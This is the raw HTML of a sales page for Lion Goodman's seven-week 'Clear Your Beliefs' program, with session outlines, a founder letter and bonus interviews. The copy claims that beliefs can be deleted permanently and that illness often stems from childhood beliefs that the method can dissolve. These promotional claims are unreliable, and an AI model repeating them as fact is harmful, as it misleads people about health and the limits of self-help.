alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img 